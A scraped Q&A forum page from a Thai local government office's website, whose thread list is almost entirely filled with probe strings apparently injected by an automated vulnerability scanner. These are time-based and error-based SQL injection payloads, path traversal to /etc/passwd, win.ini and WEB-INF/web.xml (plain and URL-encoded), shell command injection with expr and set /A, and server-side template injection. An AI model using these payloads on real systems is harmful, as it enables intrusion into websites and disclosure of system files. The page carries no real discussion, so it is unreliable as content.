:
องค์การบริหารส่วนตำบลบ้านหว้า ยินดีให้บริการ โทรศัพท์ 043-001932 อีเมล์ saraban@banwa.go.th

Q&A

หัวข้อ ผู้ตั้งกระทู้ ตอบ
ทดสอบระบบ นักจัดการงานทั่วไป 1
123456 123456 0
123456 123456'and(select'1'from/**/cast(md5(1296833858)as/**/int))>'0 0
123456 123456"and"t"="b 0
123456 123456 0
123456 123456/**/and/**/cast(md5('1332424243')as/**/int)>0 0
123456 (select*from(select+sleep(0)union/**/select+1)a) 0
123456 123456 0
123456 123456 0
../../../../../../../../../../../../../../../../../../etc/passwd 123456 0
123456 convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1487956919'))) 0
${@var_dump(md5(305084116))}; 123456 0
123456 (select*from(select+sleep(2)union/**/select+1)a) 0
123456 expr 977533055 + 928787637 123456 0
123456 123456 0
../../../../../../../../../../../../../../../../../../etc/passwd123456 123456 0
123456 123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1515846653')))>'0 0
0
0
0
งบประมาณ หล่อลำ้ 1
555 1 0
555 1 0
555 1 0
555 1 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456'and/**/extractvalue(1,concat(char(126),md5(1026719083)))and' 123456 0
123456 123456 0
123456"and/**/extractvalue(1,concat(char(126),md5(1288196249)))and" 123456 0
123456 123456 0
extractvalue(1,concat(char(126),md5(1674022769))) 123456 0
123456 123456 0
123456'and(select'1'from/**/cast(md5(1342869637)as/**/int))>'0 123456 0
123456 123456 0
123456 123456 0
123456/**/and/**/cast(md5('1996040882')as/**/int)>0 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 '+(43346*41063)+' 0
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1230542357'))) 123456 0
123456 123456 0
aylwayctfbsmzjgtpluj 123456 0
123456 123456 0
123456 123456 0
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1806883274')))>'0 123456 0
123456 123456 0
'+(40679*42460)+' 123456 0
123456鎈'"\( 123456 0
123456 aylwayctfbsmzjgtpluj 0
123456 123456 0
123456'"\( 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456/**/and+1=1 0
123456 123456/**/and+3=5 0
123456 123456'and'u'='u 0
123456 123456'and/**/extractvalue(1,concat(char(126),md5(1972374223)))and' 0
123456 123456 0
123456 123456"and/**/extractvalue(1,concat(char(126),md5(1971374002)))and" 0
123456 123456'and'd'='m 0
123456 extractvalue(1,concat(char(126),md5(1752707196))) 0
123456 123456 0
123456 123456"and"n"="n 0
'-var_dump(md5(768668701))-' 123456 0
123456|expr 974884559 + 855974810 123456 0
123456 123456'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 0
123456 123456 0
123456 123456鎈'"\( 0
./../../../../../../../../../../../../../../../../../../etc/passwd 123456 0
123456$(expr 899766061 + 869710509) 123456 0
123456 123456 0
123456 123456'and(select*from(select+sleep(2))a/**/union/**/select+1)=' 0
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 123456 0
123456 123456'"\( 0
123456&set /A 873689759+890406003 123456 0
123456 123456 0
123456 123456"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 0
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u0 123456 0
123456 ${@var_dump(md5(692399728))}; 0
123456 123456 0
expr 829325566 + 969538974 123456 0
123456 123456 0
123456 123456 0
../../../../../../etc/passwd 123456 0
123456 123456"and(select*from(select+sleep(2))a/**/union/**/select+1)=" 0
123456 '-var_dump(md5(154093822))-' 0
123456 123456 0
123456 123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/ 0
../../../../../../etc/passwd123456 123456 0
123456 123456 0
123456 123456 0
123456 123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/ 0
./../../../../../../etc/passwd 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0 0
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0 0
123456 123456 0
123456 123456 0
123456 123456 expr 824470410 + 809861250 0
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 123456 0
123456 123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/ 0
123456 123456 0
123456 123456 0
123456 123456|expr 817290053 + 934066651 0
/etc/passwd 123456 0
123456 123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/ 0
123456 123456 0
123456 123456 0
123456 123456$(expr 817120008 + 954806989) 0
123456 123456 0
123456 123456'and(select+1)>0waitfor/**/delay'0:0:0 0
/etc/passwd123456 123456 0
123456 123456 0
/*1*/{{829043903+938364471}} 123456 0
123456 123456&set /A 879553548+992254928 0
123456 123456'and(select+1)>0waitfor/**/delay'0:0:2 0
${969481155+841146902} 123456 0
%2fetc%2fpasswd 123456 0
123456 expr 960159301 + 896000383 0
123456 123456 0
${885841685+840368603} 123456 0
123456 123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('t',0) 0
${(818499391+913094989)?c} 123456 0
%u2215etc%u2215passwd 123456 0
123456 123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('p',2) 0
123456 123456 0
123456 ${928324318+988355570} 0
#set($c=888218691+865414596)${c}$c 123456 0
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 123456 0
123456 123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',0)='g 0
123456 123456 0
<%- 900381200+863300540 %> 123456 0
.\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 123456 0
123456 123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('t',2)='t 0
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini123456 123456 0
123456 123456 0
123456 123456 0
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 123456 0
123456 123456 0
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u0 123456 0
123456 123456 0
..\..\..\..\..\..\Windows\win.ini 123456 0
123456 123456 0
123456 /*1*/{{901586360+860063802}} 0
123456 123456 0
.\..\..\..\..\..\..\Windows\win.ini 123456 0
123456 ${908471095+961484585} 0
123456 123456 0
..\..\..\..\..\..\Windows\win.ini123456 123456 0
123456 ${(947184182+811620871)?c} 0
123456 123456 0
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 123456 0
123456 #set($c=988216782+957255769)${c}$c 0
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 123456 0
123456 123456 0
123456 <%- 947177544+981326612 %> 0
../../../../../../../../../../../../../../../../../../Windows/win.ini 123456 0
123456 123456 0
./../../../../../../../../../../../../../../../../../../Windows/win.ini 123456 0
123456 123456 0
123456 123456 0
../../../../../../../../../../../../../../../../../../Windows/win.ini123456 123456 0
123456 123456 0
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 123456 0
123456 123456 0
123456 123456 0
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u0 123456 0
123456 123456 0
../../../../../../Windows/win.ini 123456 0
123456 123456 0
./../../../../../../Windows/win.ini 123456 0
123456 123456 0
123456 123456 0
../../../../../../Windows/win.ini123456 123456 0
123456 123456 0
123456 123456 0
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 123456 0
123456 123456 0
123456 123456 0
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 123456 0
123456 123456 0
WEB-INF/web.xml 123456 0
123456 123456 0
WEB-INF/web.xml;123456 123456 0
../WEB-INF/web.xml 123456 0
123456 123456 0
123456 123456 0
../WEB-INF/web.xml;123456 123456 0
123456 123456 0
../../WEB-INF/web.xml 123456 0
123456 123456 0
../../WEB-INF/web.xml;123456 123456 0
123456 123456 0
../../../WEB-INF/web.xml 123456 0
123456 123456 0
123456 123456 0
../../../WEB-INF/web.xml;123456 123456 0
../../../../WEB-INF/web.xml 123456 0
123456/**/and+1=1 123456 0
../../../../WEB-INF/web.xml;123456 123456 0
123456/**/and+0=7 123456 0
123456'and'p'='p 123456 0
123456 123456 0
123456'and'x'='s 123456 0
123456"and"g"="g 123456 0
123456"and"y"="e 123456 0
(select*from(select+sleep(0)union/**/select+1)a) 123456 0
123456 123456 0
(select*from(select+sleep(2)union/**/select+1)a) 123456 0
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 123456 0
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)=' 123456 0
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 123456 0
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)=" 123456 0
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/ 123456 0
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/ 123456 0
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0 123456 0
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0 123456 0
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/ 123456 0
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/ 123456 0
123456'and(select+1)>0waitfor/**/delay'0:0:0 123456 0
123456'and(select+1)>0waitfor/**/delay'0:0:2 123456 0
123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('t',0) 123456 0
123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('b',2) 123456 0
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('o',0)='o 123456 0
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('o',2)='o 123456 0